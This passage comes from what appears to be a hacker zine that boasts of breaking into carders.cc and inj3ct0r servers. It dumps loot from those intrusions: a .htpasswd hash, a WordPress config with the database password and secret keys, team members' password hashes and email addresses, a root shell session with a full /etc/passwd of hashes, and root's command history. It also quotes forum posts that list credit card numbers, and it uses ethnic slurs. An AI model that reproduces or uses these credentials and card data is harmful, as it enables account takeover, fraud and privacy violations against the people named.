653-rwxrwxr-x 1 carderscc www 657 Apr 28 2008 playerProductInstall.swf
654
655$ cd pma
656
657$ cat .htpasswd
658admin:0VisONWLe5DJE
659
660$ cd /
661
662$ls
663total 47
664drwxr-xr-x 17 root wheel 512 Jul 3 19:12 .
665drwxr-xr-x 17 root wheel 512 Jul 3 19:12 ..
666-rw-r--r-- 1 root wheel 798 Jan 18 2010 .cshrc
667-rw-r--r-- 1 root wheel 265 Jan 18 2010 .profile
668-r--r--r-- 1 root wheel 6206 Jan 18 2010 COPYRIGHT
669-rw-r--r-- 1 root wheel 0 Jul 3 19:12 a
670drwxr-xr-x 2 root wheel 1024 Jan 18 2010 bin
671drwxr-xr-x 7 root wheel 512 Jan 18 2010 boot
672dr-xr-xr-x 5 root wheel 512 Nov 24 21:14 dev
673drwxr-xr-x 22 root wheel 2560 Nov 1 23:54 etc
674drwxr-x--x 4 root wheel 512 Nov 1 23:54 home
675drwxr-xr-x 3 root wheel 1536 Jan 18 2010 lib
676drwxr-xr-x 2 root wheel 512 Apr 4 2010 libexec
677drwxr-xr-x 2 root wheel 512 Jan 18 2010 media
678drwxr-xr-x 2 root wheel 512 Jan 18 2010 mnt
679dr-xr-xr-x 1 root wheel 0 Dec 6 00:58 proc
680drwxr-xr-x 11 root wheel 1024 Nov 8 20:33 root
681drwxr-xr-x 2 root wheel 2560 Jan 18 2010 sbin
682lrwxr-xr-x 1 root wheel 11 Jan 18 2010 sys -> usr/src/sys
683drwxrwxrwt 11 root wheel 512 Dec 5 23:42 tmp
684drwxr-xr-x 15 root wheel 512 Jan 18 2010 usr
685drwxr-xr-x 23 root wheel 512 Nov 24 21:14 var
686
687?>
688
689$ cd /home/cardersblog
690
691$ ls
692total 8
693drwxr-xr-x 4 cardersblog www 512 Nov 2 01:16 .
694drwxr-x--x 4 root wheel 512 Nov 1 23:54 ..
695dr-xr-x--- 5 cardersblog www 1024 Nov 21 00:18 blog.carders.cc
696drwxrwxrwx 2 cardersblog www 512 Nov 2 01:16 temp
697
698$ cd blog.carders.cc
699
700$ ls
701total 2928
702dr-xr-x--- 5 cardersblog www 1024 Nov 21 00:18 .
703drwxr-xr-x 4 cardersblog www 512 Nov 2 01:16 ..
704-rw-r--r-- 1 cardersblog www 188 Nov 21 00:18 .htaccess
705-r-xr-x--- 1 cardersblog www 397 Aug 27 17:22 index.php
706-r-xr-x--- 1 cardersblog www 2683109 Jul 18 16:06 latest.tar.gz
707-r-xr-x--- 1 cardersblog www 15410 Aug 27 17:22 license.txt
708-r-xr-x--- 1 cardersblog www 9122 Aug 27 17:22 readme.html
709-r-xr-x--- 1 cardersblog www 4391 Aug 27 17:22 wp-activate.php
710dr-xr-x--- 7 cardersblog www 2560 Jul 18 16:06 wp-admin
711-r-xr-x--- 1 cardersblog www 40284 Aug 27 17:23 wp-app.php
712-r-xr-x--- 1 cardersblog www 220 Aug 27 17:23 wp-atom.php
713-r-xr-x--- 1 cardersblog www 274 Aug 27 17:23 wp-blog-header.php
714-r-xr-x--- 1 cardersblog www 3926 Aug 27 17:23 wp-comments-post.php
715-r-xr-x--- 1 cardersblog www 238 Aug 27 17:23 wp-commentsrss2.php
716-r-xr-x--- 1 cardersblog www 3173 Aug 27 17:23 wp-config-sample.php
717-r-xr-x--- 1 cardersblog www 3506 Jul 31 14:20 wp-config.php
718dr-xr-x--- 6 cardersblog www 512 Aug 27 18:05 wp-content
719-r-xr-x--- 1 cardersblog www 1255 Aug 27 17:23 wp-cron.php
720-r-xr-x--- 1 cardersblog www 240 Aug 27 17:23 wp-feed.php
721dr-xr-x--- 7 cardersblog www 2560 Jul 18 16:06 wp-includes
722-r-xr-x--- 1 cardersblog www 2002 Aug 27 17:23 wp-links-opml.php
723-r-xr-x--- 1 cardersblog www 2441 Aug 27 17:23 wp-load.php
724-r-xr-x--- 1 cardersblog www 26059 Aug 27 17:23 wp-login.php
725-r-xr-x--- 1 cardersblog www 7774 Aug 27 17:23 wp-mail.php
726-r-xr-x--- 1 cardersblog www 487 Aug 27 17:23 wp-pass.php
727-r-xr-x--- 1 cardersblog www 218 Aug 27 17:23 wp-rdf.php
728-r-xr-x--- 1 cardersblog www 316 Aug 27 17:23 wp-register.php
729-r-xr-x--- 1 cardersblog www 218 Aug 27 17:23 wp-rss.php
730-r-xr-x--- 1 cardersblog www 220 Aug 27 17:23 wp-rss2.php
731-r-xr-x--- 1 cardersblog www 9177 Aug 27 17:23 wp-settings.php
732-r-xr-x--- 1 cardersblog www 18695 Aug 27 17:23 wp-signup.php
733-r-xr-x--- 1 cardersblog www 3702 Aug 27 17:23 wp-trackback.php
734-r-xr-x--- 1 cardersblog www 94184 Aug 27 17:23 xmlrpc.php
735
736$ cat wp-config.php
737<?php
738/**
739 * The base configurations of the WordPress.
740 *
741 * This file has the following configurations: MySQL settings, Table Prefix,
742 * Secret Keys, WordPress Language, and ABSPATH. You can find more information
743 * by visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing
744 * wp-config.php} Codex page. You can get the MySQL settings from your web host.
745 *
746 * This file is used by the wp-config.php creation script during the
747 * installation. You don't have to use the web site, you can just copy this file
748 * to "wp-config.php" and fill in the values.
749 *
750 * @package WordPress
751 */
752
753// ** MySQL settings - You can get this info from your web host ** //
754/** The name of the database for WordPress */
755define('DB_NAME', 'carderscc_02');
756
757/** MySQL database username */
758define('DB_USER', 'carderscc_02');
759
760/** MySQL database password */
761define('DB_PASSWORD', 'UGZf7e6gzugef76t&/gudz376/&$%e3zugdwzgdwdztFzettf6532df');
762
763/** MySQL hostname */
764define('DB_HOST', 'localhost');
765
766/** Database Charset to use in creating database tables. */
767define('DB_CHARSET', 'utf8');
768
769/** The Database Collate type. Don't change this if in doubt. */
770define('DB_COLLATE', '');
771
772/**#@+
773 * Authentication Unique Keys and Salts.
774 *
775 * Change these to different unique phrases!
776 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
777 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
778 *
779 * @since 2.6.0
780 */
781define('AUTH_KEY', 'Mcpgq1/{n^mP,4naDg;4Y/gdX+J~.(DBLI|y~FJy*+@BDtD=CJr^M$idR[*P vuR');
782define('SECURE_AUTH_KEY', '-=q0$7`R?iH}MkK^KHxbxa4)-]OcrG3y2^EVT^fs%6&7-!<v.<__AcgC^_T+$$sM');
783define('LOGGED_IN_KEY', 'Sb{c7+Nhb%ao-#ylff|(I{m,fqK5}>/?7m8/r0!,o}+e:eQfZo;7W:h7av[E:0V[');
784define('NONCE_KEY', '|R(!,}:(`utsK5k<SJ%:J#b&UR/LxE.50Y9`6:zP;Kj0VVeGWx4(%Guh=+gb^{W6');
785define('AUTH_SALT', '|zI ^JtuY-|uB;}I~X~Sn.W[BZ_pX gWA*nFL`SR]b+ bB,LVj7u+Rov|F=*@ DP');
786define('SECURE_AUTH_SALT', 'N^]btUNZY-k+|%HkM##`iB2b{pftxG~:WDLwp}a!M+d8Gy.*M?p(]-SQPfZq]+k)');
787define('LOGGED_IN_SALT', 'JASsyk1%PQ|!exxL,JB|0or-~zWcx+lv+KpnMH<M<&+Ro=USk--Z:8 #8a!+NkL$');
788define('NONCE_SALT', 'yN8`y~ji$4+1)&N3j+KcY*x~n7=vS)Ip;! [>Q0$LoSd=e?X+C]bqBEp5WWbWLSb');
789
790/**#@-*/
791
792/**
793 * WordPress Database Table prefix.
794 *
795 * You can have multiple installations in one database if you give each a unique
796 * prefix. Only numbers, letters, and underscores please!
797 */
798$table_prefix = 'wp_';
799
800/**
801 * WordPress Localized Language, defaults to English.
802 *
803 * Change this to localize WordPress. A corresponding MO file for the chosen
804 * language must be installed to wp-content/languages. For example, install
805 * de.mo to wp-content/languages and set WPLANG to 'de' to enable German
806 * language support.
807 */
808define ('WPLANG', '');
809
810/**
811 * For developers: WordPress debugging mode.
812 *
813 * Change this to true to enable the display of notices during development.
814 * It is strongly recommended that plugin and theme developers use WP_DEBUG
815 * in their development environments.
816 */
817define('WP_DEBUG', false);
818
819/* That's all, stop editing! Happy blogging. */
820
821/** Absolute path to the WordPress directory. */
822if ( !defined('ABSPATH') )
823 define('ABSPATH', dirname(__FILE__) . '/');
824
825/** Sets up WordPress vars and included files. */
826require_once(ABSPATH . 'wp-settings.php');
827
828##
829
830
831 |
832 __________ |
833 _ __ _ | | |
834 /_\ / \ /_\ | | |
835 put shit =|= | // | =|= | | |
836 to shit ! \__/ ! | | |
837 carders.cc _ | | |
838 ___ | ___ //' | | |
839 [___] | _ :=| |=: __T_||_T__ |p= | |
840 | ~| | =)_)= | | [__________] | | |
841 | | | (_( |xXx| \_ _/ | | |
842 | | | )_) """"" \ / | | |
843 \___| V | | | | |
844 | `========, | | | | |
845________`. .'_________________| |________|__________lc_|
846 `. .' (____) \
847 _| |_... .;;;;;;;;. \
848 (________);;;; :;;;;;;;;;;:
849 :::::::' '::::::::' HAPPY NINJA BATHROOM
850
851Team Member Passes:
852
853Vitali:28cf8ccb53f80f7e8fca5e781f2e6424:dusFzU/ZvUe;e@fx\\3>XIgN[yGx9[*:admin@carders.cc
854Juri:9475264713e83164de106d099350ff97:pqfgN4x7P)5_}0-E+PsIJ\\=_o1|oV&:daafagafd@dadadagfasg.dsxc
855Luigi:13ae8bfbd4fc44302fc6261f58dd583e:.u5//.-K4<b~M[3Ag#|xSIHhmSuKrT:bla@bla.de
856acheron:60536586e174bce7aa1fccf6a674f6f6:"Ru97*G!'*1'{vhs}3Ze4jCnQ8CT=p:
857cyberhood:c5ad50f86c6dbbbea072c243b6466a1f:XY4NYQYr:soh.cyberhood@googlemail.com
858e0s:86ca341341366d95e5eb02c79d1cfd47:Q\\8NL6Zno+G-}J'n(T?ndQbV{vhcN=:e0s@z1p.biz
859M0RPHEUS:fa667b7f92f7cc9f7739bbbbe68f9a9c:E\\T$#=?"hy"g0BD~@giHAtDDj`P0VS:m0rpheus@carders.cc
860Mr.Rus:6e3c81779f105c2cb8a5f36261000cc5:x6GX91GTd$D^yn/@U>`u$lm00M3V}h:d397080@lhsdv.com
861Poseidon:0c18d81bcfa2845490f75e785f0e2457:BG$vA-%K_X<F8S%-"~fzr8&t(JJV)7:b2926398@lhsdv.com
862SILEN0S:a02675626c179834bf1a2545658a9426:5{+!Og}.xKA&$PHo)5nH-DKO_[zK9L:silen0s@ymail.com
863slashx:edb36a0c2d7fe71ecabe36152b4ff942:S'I)uhPovr~Y=;/$S=p)k.SFdqw7)P:jobby.cyriac@web.de
864Tiberius:03b38fcabea847925ab42d66e8134d1b:GS.XKvwJnhsr[7a9l7E6g+?E><=|nF:tiberiusus@carders.in
865
866
867You guys dont get it, do you? We told you to fuck off and still you
868did not listen. We are not sorry for doing it again. You deserve it.
869
870 ____________________________________________________|_._._._._._._._,
871 \___________________________________________________|_|_|_|_|_|_|_|_|
872 ! ~ inj3ct0r ~
873
874#`````````` ___ ____ ____
875#````______/```\__//```\__/____\
876#``_/```\_/``:```````````//____\
877#`/|``````:``:``..``````/````````\ W A R N I N G !!! DISCOVERED LAMER O_o
878#|`|`````::`````::``````\````````/
879#|`|`````:|`````||`````\`\______/
880#|`|`````||`````||``````|\``/``|
881#`\|`````||`````||``````|```/`|`\ 1) maybe you were wrong address, go Inj3ct0r.com
882#``|`````||`````||``````|``/`/_\`\
883#``|`___`||`___`||``````|`/``/````\
884#```\_-_/``\_-_/`|`____`|/__/``````\
885#````````````````_\_--_/````\`````/ 2) Or you are not wrong address, then Fuck Off!
886#```````````````/____```````````/
887#``````````````/`````\`````````/
888#``````````````\______\_______/
889
890Attention. This ridiculous banner is *not* part of our zine. In fact
891it is inj3ct0r's 404 page. We concluded that this banner perfectly
892reflects their retardedness. Their knowledge about security is on the
893same level as their ability to speak proper english. For those who
894don't know: inj3ct0r is a clone of the old milw0rm project,
895administered by some morons called "r0073r", "Sid3^effects" and "L0rd
896CrusAd3r". They are not only an exploit-db, but also an arrogant
897community of retarded turks and arabs which tell you how you to write
898your stupid Perl SQL-Injection exploit.
899
900All their attention whoring about how they hacked Facebook was driving
901us insane and all their moaning about how they have problems with the
902law was just too ridiculous for us to let them continue existing.
903Actually we did not find out what kind of law problems they actually
904had. We did however discover how stupid these kids are and what crap
905they are talking about in their private forum area's. Check it out:
906
907-------------
908-0day 31337 privat Area
909-10-24-2010, 05:08 PM Post by KnocKout:
910-
911-0-Day Credit Cards | Part 2(Only 31337 Prv.)-
912-
913-Hi My Brothers..
914-
915-14367 4454-5454-5454-5445 1 232 12-2012
916-14375 5257-9555-0001-0933 1 082 03-2013 ADVANTAGE
917-14376 5492-9495-5876-7382 1 280 01-2013 BONUS
918-14391 5437-7122-6415-1343 1 334 07-2012 MAXÃÂMUM
919-14392 5437-7122-6415-1343 1 334 07-2012 MAXÃÂMUM
920--------------
921-
922-0day 31337 privat Area
923-10-17-2010, 04:36 PM Post by KnocKout:
924-
925-Default => Rapid,Hotfile,CC Requests..
926-
927-hi my brothers,
928-RapidShare, Hotfile Premium and Credit Card. Requests..
929-
930-Please indicate your requests here, and I will send Pm..
931--------------
932
933Not only they are sharing CC's, they also think of themselves as the
934best hackerz on the planet. Here is how they talk about exploit-db and
935offsec:
936
937-------------
938-0day 31337 privat Area:
939-07-19-2010, 10:05 PM Post by SeeMe:
940-
941-guys, a bind shell have been sent to offsec server and enforced the regarding ports to be open
942-
943-Port State Service Reason Product Version Extra info
944-22 tcp open ssh syn-ack OpenSSH 5.4 protocol 2.0
945-80 tcp open http syn-ack Apache httpd 2.2.15 (Fedora)
946-301 tcp filtered unknown no-response
947-443 tcp open https syn-ack
948-1072 tcp filtered unknown no-response
949-1087 tcp filtered unknown no-response
950-1100 tcp filtered unknown no-response
951-1111 tcp filtered unknown no-response
952-1117 tcp filtered unknown no-response
953-1443 tcp filtered ies-lm no-response
954-1718 tcp filtered unknown no-response
955-1720 tcp filtered H.323/Q.931 no-response
956-1900 tcp filtered upnp no-response
957-2000 tcp filtered cisco-sccp no-response
958-2041 tcp filtered interbase no-response
959-2046 tcp filtered sdfunc no-response
960-2382 tcp filtered ms-olap3 no-response
961-3017 tcp filtered unknown no-response
962-4129 tcp filtered unknown no-response
963-4900 tcp filtered unknown no-response
964-5060 tcp filtered sip admin-prohibited
965-5555 tcp filtered freeciv no-response
966-5560 tcp filtered isqlplus no-response
967-6669 tcp filtered irc no-response
968-8007 tcp filtered ajp12 no-response
969-9102 tcp filtered jetdirect no-response
970-10000 tcp open snet-sensor-mgmt syn-ack
971-44443 tcp filtered coldfusion-auth no-response
972-
973-but I just can't connect back to it
974-
975-any idea!
976-------------
977-
978-07-21-2010, 10:10 PM Post by SeeMe:
979-
980-This is a new technology for me how to gain credentials over HTTP TRACE and TRACK
981-when it's enable on a webserver
982-
983-The TRACE/TRACK method was enabled on the server listed below:
984-
985-http://www.offensive-security.com:80/
986-
987-[PHP]http://www.offensive-security.com/wp-content/themes/infocus/lib/scripts/prettyPhoto/js/jquery.prettyPhoto.js?ver=./2.9.2%20HTTP/1.1[/PHP]
988-
989-
990-could gain view info from the link above
991-------------
992-
993-07-30-2010, 12:26 AM Post by SeeMe:
994-
995-http://mobile.backtrack-linux.org/
996-
997-exploited for good and not sure that will be able to back it up
998-
999-and I'm still heading for the main both sites, offsec.com and exploit-db
1000-
1001-After one month into the desert I'll be back infront of my computer on 15th of Agu
1002-
1003-and I'll prepare for a globel war
1004-------------
1005
1006
1007They are calling exploit-db "lamers-db" yet they don't see who the
1008real lamers are. Hardly surprising that the inj3ct0r team did not
1009manage their box themselves and instead gave their work to some fat
1010guy called "asker". But since he left his box rot with some half
1011updated shit, it was a child's play to tap in and root.
1012
1013$ uname -a
1014Linux wateam 2.6.26-2-686 #1 SMP Thu Sep 16 19:35:51 UTC 2010 i686 GNU/Linux
1015
1016$ id
1017uid=0(root) gid=0(root) groups=0(root)
1018
1019$ cd /
1020
1021$ ls -la
1022total 540
1023drwxr-xr-x 22 root root 1024 Oct 3 22:04 .
1024drwxr-xr-x 22 root root 1024 Oct 3 22:04 ..
1025drwxr-xr-x 2 root root 3072 Oct 3 21:09 bin
1026drwxr-xr-x 4 root root 1024 Oct 3 21:10 boot
1027drwxr-xr-x 15 root root 3460 Oct 15 15:19 dev
1028drwxr-xr-x 68 root root 6144 Oct 20 17:44 etc
1029drwxr-x--x 37 root root 4096 Oct 20 17:45 home
1030drwxr-xr-x 2 root root 1024 Nov 3 2007 initrd
1031lrwxrwxrwx 1 root root 28 Jul 29 11:28 initrd.img -> boot/initrd.img-2.6.26-2-686
1032lrwxrwxrwx 1 root root 28 Nov 24 2008 initrd.img.old -> boot/initrd.img-2.6.18-6-686
1033drwxr-xr-x 12 root root 7168 Oct 3 21:09 lib
1034drwx------ 2 root root 12288 Nov 3 2007 lost+found
1035drwxr-xr-x 2 root root 1024 Nov 3 2007 media
1036drwxr-xr-x 2 root root 1024 Oct 28 2006 mnt
1037drwxr-xr-x 2 root root 1024 Nov 3 2007 opt
1038dr-xr-xr-x 154 root root 0 Oct 15 15:18 proc
1039drwxr-x--- 7 root root 1024 Oct 15 17:27 root
1040drwxr-xr-x 2 root root 6144 Oct 3 21:09 sbin
1041drwxr-xr-x 2 root root 1024 Sep 16 2008 selinux
1042drwxr-xr-x 2 root root 1024 Nov 3 2007 srv
1043drwxr-xr-x 11 root root 0 Oct 15 15:18 sys
1044drwxrwxrwt 7 root root 492544 Oct 24 19:03 tmp
1045drwxr-xr-x 12 root root 4096 Jul 29 11:22 usr
1046drwxr-xr-x 15 root root 4096 Oct 29 2009 var
1047lrwxrwxrwx 1 root root 25 Jul 29 11:28 vmlinuz -> boot/vmlinuz-2.6.26-2-686
1048lrwxrwxrwx 1 root root 25 Nov 24 2008 vmlinuz.old -> boot/vmlinuz-2.6.18-6-686
1049
1050$ cat /etc/passwd
1051root:1NMGwkEq76.BsjeYGuM106fIjuU.RS/:0:0:root:/root:/bin/bash
1052daemon:*:1:1:daemon:/usr/sbin:/bin/sh
1053bin:*:2:2:bin:/bin:/bin/sh
1054sys:*:3:3:sys:/dev:/bin/sh
1055sync:*:4:65534:sync:/bin:/bin/sync
1056games:*:5:60:games:/usr/games:/bin/sh
1057man:*:6:12:man:/var/cache/man:/bin/sh
1058lp:*:7:7:lp:/var/spool/lpd:/bin/sh
1059mail:*:8:8:mail:/var/mail:/bin/sh
1060news:*:9:9:news:/var/spool/news:/bin/sh
1061uucp:*:10:10:uucp:/var/spool/uucp:/bin/sh
1062proxy:*:13:13:proxy:/bin:/bin/sh
1063www-data:*:33:33:www-data:/var/www:/bin/sh
1064backup:*:34:34:backup:/var/backups:/bin/sh
1065list:*:38:38:Mailing List Manager:/var/list:/bin/sh
1066irc:*:39:39:ircd:/var/run/ircd:/bin/sh
1067gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
1068nobody:*:65534:65534:nobody:/nonexistent:/bin/sh
1069mysql:!:100:102:MySQL Server,,,:/var/lib/mysql:/bin/false
1070proftpd:!:101:65534::/var/run/proftpd:/bin/false
1071ftp:!:102:65534::/home/ftp:/bin/false
1072sshd:!:103:65534::/var/run/sshd:/usr/sbin/nologin
1073Debian-exim:!:104:104::/var/spool/exim4:/bin/false
1074krivopustov:1V5RSW94dbZ3zwhsovKB4V5hHgvLLF/:1002:1002:,,,:/home/krivopustov:/bin/bash
1075volosovets:1NMLjMXqhFedJgnjw0uBwdQ2jRFqbG0:1007:1007:,,,:/home/volosovets:/bin/bash
1076wapper:1c1iEEB/k591mvgQk8a5mbsZmPwY8Q1:1008:1008:,,,:/home/wapper:/bin/bash
1077jaguar:1NOCfawFB/TD6X9.hEmN9Mn0kg1G.s1:1011:1011:,,,:/home/jaguar:/bin/bash
1078postfix:!:105:106::/var/spool/postfix:/bin/false
1079popa3d:!:106:109::/var/lib/popa3d:/bin/false
1080asmer:1O2E8f0enwpuZw37FkNoe0MNSktFTd.:1012:1012:,,,:/home/asmer:/bin/bash
1081wateam:1cewmdLFokkbiLeLlHrL2NJnPdqpnR/:1013:1013:,,,:/home/wateam:/bin/bash
1082silentwarrior:1aDOI9IqA5BrDw1EBfH4Afm5TYRNe//:1014:1014:,,,:/home/silentwarrior:/bin/bash
1083snt-nmu:1NZO0tdC.reQ07bby/FttmOEZLF7ys1:1015:1015:,,,:/home/snt-nmu:/bin/bash
1084nmusic:1tXoV.I8o28zdaeu.Ukrde4hYikNtG0:1020:1020:,,,:/home/nmusic:/bin/bash
1085mydns:1C8cYgZB0p9rtxWwyXoiJiK4QUa.sJ/:1021:1021:,,,:/home/mydns:/bin/bash
1086conference-sidelnikov:1ghcMsPcI9j5ok3AbEf5qGI.h7Mq7O.:1016:1016:,,,:/home/conference-sidelnikov:/bin/bash
1087lena:153QNshcJB/5PK1r8L/60LAOJCwzik1:1000:1000:,,,:/home/lena:/bin/bash
1088vakulenko:1g6y9T9/TWWr1s.FTZKwuKj2qwbYxg1:1027:1027:,,,:/home/vakulenko:/bin/bash
1089xanavi:1V4L5wKgWog9Kl4lV0uwvG0/0TyHyq1:1001:1001:,,,:/home/xanavi:/bin/bash
1090lalizas:1dzDm0j2v0fE06VyK89b/Pfm6ePylC0:1003:1003:,,,:/home/lalizas:/bin/bash
1091r0otech0inj3ct0rr00t0ro0t3r:1Yu.4UMOxpFH639CL8260qyjYwKgbk1:1006:1034:,,,:/home/r0otech0inj3ct0rr00t0ro0t3r:/bin/bash
1092n3tw0rkTeRr0r15M:1u1DDFCJnGFd0M07E5kahW3t0N1yYD1:1010:1034:,,,:/home/n3tw0rkTeRr0r15M:/bin/bash
1093pma:1cDULb4Zqt4ksmqqFe9MIQSBLrz3lO.:1019:1019:,,,:/home/pma:/bin/bash
1094valiant:1QXeOzsOyaW8gT6JknX1Ssa.A3ef8g/:1024:1024:,,,:/home/valiant:/bin/bash
1095cherrybikes:11MJaagK8rJ6BQ9pxLdZjU.WhIGG4r0:1031:1031:,,,:/home/cherrybikes:/bin/bash
1096natasha:1NmwIlomO.Y00wBbg0eGE9dqOP4qis/:1032:1032:,,,:/home/natasha:/bin/bash
1097ntp:!:107:107::/home/ntp:/bin/false
1098chupik:1gpJL5HGbm7EeCor46OOs8L0y1L7mH1:1005:1033:,,,:/home/chupik:/bin/bash
1099sweethome:1x4j1/bzV8Vf5fHBfeSp3BgMUNojJf.:1004:1035:,,,:/home/sweethome:/bin/bash
1100sweethome-lena:1uZFdDmVbAHGDtbBEGs1jjYYtvVONN1:1009:1036:,,,:/home/sweethome-lena:/bin/bash
1101skyweb:1.wiXZLSKG4F6WGVdgKDIorjx77.ZD1:1028:1037:,,,:/home/skyweb:/bin/bash
1102yslivka:1RNlOuljj5wZ8hdD0kSDe2wPMREdBu1:1029:1038:,,,:/home/yslivka:/bin/bash
1103tmv-nmu:168k122DrZFKqjXrwYSjjdMSKzzVDy.:1030:1039:,,,:/home/tmv-nmu:/bin/bash
1104web-ghost:1wuuXL1mSrDxVErzeO0KuoZKu8mJBj1:1018:1018:,,,:/home/web-ghost:/bin/bash
1105tiler-andrey:1RGxMA/cQA090Sx/VTTctkkHFZEs7I1:1035:1041:,,,:/home/tiler-andrey:/bin/bash
1106sunsanych:1RaR9SD58m80b/DVZEHYg6Ik4SKYWJ.:1036:1042:,,,:/home/sunsanych:/bin/bash
1107ra5ta:1nkELVbaHtGqTJl29kSFbjlDs1Yy3U0:1037:1043:,,,:/home/ra5ta:/bin/bash
1108magicgarden:1.MBu1KaRXkR2bihB8ZXnqfHbqQ5bm0:1038:1044:,,,:/home/magicgarden:/bin/bash
1109hochumogu:1MwCkIsEmO0Xe/BV8PndFgE9sIMF/Q1:1025:1025:,,,:/home/hochumogu:/bin/bash
1110libuuid:!:108:110::/var/lib/libuuid:/bin/sh
1111steelnews:1ajGgNpodz1jrN1JlmcmLmms5Wf7kn0:1017:1017:,,,:/home/steelnews:/bin/bash
1112vonline:1sk1MRD8BW3jlEKEYUNCtJ3d0gY1bh0:1022:1045:,,,:/home/vonline:/bin/bash
1113dyquem:1JkATmEyg3XnBHIeGOEstzP2vmes4s1:1039:1046:,,,:/home/dyquem:/bin/bash
1114vika:1bkhqsMEjgj7H.DzRJLoGj64SksjzM1:1040:1047:,,,:/home/vika:/bin/bash
1115tiler-dima:1jKtO0mArwxlajKK9/v4yFHF1mu9/g0:1026:1040:,,,:/home/tiler-dima:/bin/bash
1116mazafaka:1LSjx2PhiI7OlLVcMSEz2GJDUiwBmg.:1034:1034:,,,:/home/mazafaka:/bin/bash
1117tiler:1Qa4oVdJmYjcu6Ccq/7AqTEA6V2GIT1:1023:1023:,,,:/home/tiler:/bin/bash
1118
1119$ cd /root
1120
1121$ ls -la
1122total 14
1123drwxr-x--- 7 root root 1024 Oct 15 17:27 .
1124drwxr-xr-x 22 root root 1024 Oct 3 22:04 ..
1125drwx------ 2 root root 1024 Aug 20 02:09 .aptitude
1126-rw------- 1 root root 6748 Oct 22 22:28 .bash_history
1127drwxr-xr-x 2 root root 1024 Aug 20 02:09 .debtags
1128drwxr-xr-x 2 root root 1024 Oct 15 17:29 .mc
1129drwxr-xr-x 2 root root 1024 Aug 2 21:39 scripts
1130drwxr-xr-x 2 root root 1024 Oct 15 16:51 test
1131
1132$ cat .bash_history
1133apache2 -k restart
1134cd /home/maza*/h*
1135ls -al
1136nano index.html
1137ls -al
1138nano index.html
1139exit
1140a2ensite mazafaka.in
1141apache2 -k restart
1142edquota -g inj3ct0r
1143quotatool
1144quotatool -g inj3ct0r -bl 512M /home
1145edquota inj3ct0r
1146edquota -g inj3ct0r
1147exit
1148cd /home/n*
1149ls -al
1150cd ht*
1151ls -al
1152nano index.php
1153ls -al
1154cd t*dark
1155ls -al
1156cd gra*
1157ls -al
1158cd ..
1159du
1160cd ..
1161ls -al
1162du tech_dark
1163du tech_blue
1164du tech_white
1165ls -al
1166cd cpstyles
1167ls -al
1168du
1169du -h
1170cd .
1171cd..
1172 cd ..
1173du -h *dark
1174cd tech_dark
1175ls -al
1176cd misc
1177ls -al
1178cd ..
1179cd ..
1180find ./ -name *.tpl
1181find ./ -name *.htm
1182find ./ -name *.htm*
1183find ./ -name *.tpl
1184cd ..
1185cd ht*
1186cd gree*
1187ls -al
1188du -h
1189cd pools
1190cd pools
1191cd polls
1192ls -al
1193cd ..
1194cd regimage
1195ls -la
1196cd ../..
1197nano index.php
1198ls -al
1199rm ya*.txt
1200rm google*
1201cd incl*
1202ls -al
1203cd ..
1204ls -al
1205cd green*
1206ls -al
1207cd editor
1208ls -al
1209cd ..
1210cd attach
1211ls -al
1212cd ..
1213cd ..
1214ls -al
1215find ./ -name *.css
1216cd cp*
1217ls -al
1218cd vB*
1219ls -al
1220cd ..
1221ls -al
1222du -h
1223cd ..
1224find ./ -name *.css
1225nano ./tech_white/tech_white.css
1226exit
1227cd /etc/
1228nano crontab
1229exit
1230cd /var/
1231ls -la
1232cd mail
1233ls -al
1234cd /etc/postfix
1235nano virtual
1236postmap virtual
1237nano aliases
1238defrag
1239ls -al
1240exit
1241cd /var/mail
1242ls -al
1243rm tiler-*
1244ls -la
1245exit
1246exit
1247passwd tiler
1248passwd tiler
1249exit
1250cd /etc/
1251nano passwd
1252exit
1253passwd lena
1254exit
1255sasldbpasswd2
1256saslpasswd2
1257saslpasswd2 -c lena
1258sasllistusers2
1259sasldblistusers2
1260saslpasswd2
1261saslpasswd2 -d sweethome-lena
1262exit
1263saslpasswd2 -c sweethome-lena
1264passwd sweethome-lena
1265exit
1266passwd tiler
1267exit
1268cd /home/snt*
1269ls -al
1270cd ht*
1271ls -al
1272nano index.php
1273exit
1274cd /home/sn*/h*/
1275nano index.php
1276cd /home/wa*/h*
1277ls -al
1278nano index.php
1279cd /home/wateam
1280cd h*
1281nano index.html
1282exit
1283cd /home
1284ls -al
1285cd lena
1286ls -al
1287cd htdocs
1288ls -al
1289cd ..
1290cd ..
1291rm lena -R
1292cd mydns
1293ls -al
1294cd ..
1295rmdir mydns
1296cd temp
1297ls -al
1298du -h
1299rm *
1300cd ..
1301ls -al
1302cd lo*
1303ls -al
1304cd ..
1305rmdir lost+found
1306exit
1307cd /home/wateam
1308ls -al
1309cd other
1310ls -al
1311cd ../htdocs
1312nano index.html
1313exit
1314cd /home/n*
1315cd htdocs
1316ls -al
1317cd inc*
1318ls -al
1319nano config.php
1320exit
1321cd /etc/apache2
1322nano apache2.conf
1323nano vhosts.conf
1324
1325nano apache2.conf
1326apache2 -k restart
1327nano apache2.conf
1328apache2 -k restart
1329cd /mo*e
1330cd mo*e
1331nano fcgi*
1332cd ..
1333nano vhosts
1334nano vhosts
1335cd /var/lib/log*
1336ls -al
1337cat status
1338cat status|more
1339nano status
1340rm status
1341logrotate
1342logrotate -f /etc/logrotate.conf
1343ls -al
1344nano status
1345ls -al
1346df -h
1347cd /var/log
1348ls -al
1349exit
1350cd /home/
1351tar --help
1352tar
1353cls
1354tar --help|more
1355tar --help|more
1356tar --help|more
1357cd cd tiler
1358ls -al
1359cd tiler
1360ls -al
1361tar cvzf tiler.tar
1362ls -al
1363cd ht*
1364ls -al
1365tar cvzf tiler.tar
1366tar --help|more
1367man tar
1368ls -akl
1369ls -al
1370cd ..
1371tar -zcvf tiler.tar htdocs
1372ls -la
1373nano /etc/passwd
1374init 6
1375exit
1376ren
1377rename
1378mkdir test
1379cd test
1380touch 1d_5.jpg
1381touch 1d_7.JPG
1382touch 1.jpg
1383touch 1d7.JPg
1384ls -al
1385rename
1386rename --help
1387man rename
1388rename -n (.*)\.JPG 1.jpg
1389rename -n '/.*\.JPG/' *.jpg
1390rename -n /.*\.JPG/ *.jpg
1391rename -n /.*\.JPG/ *
1392rename -nv /.*\.JPG/ *
1393ls -al
1394rename -nv s/.*\.JPG/ *
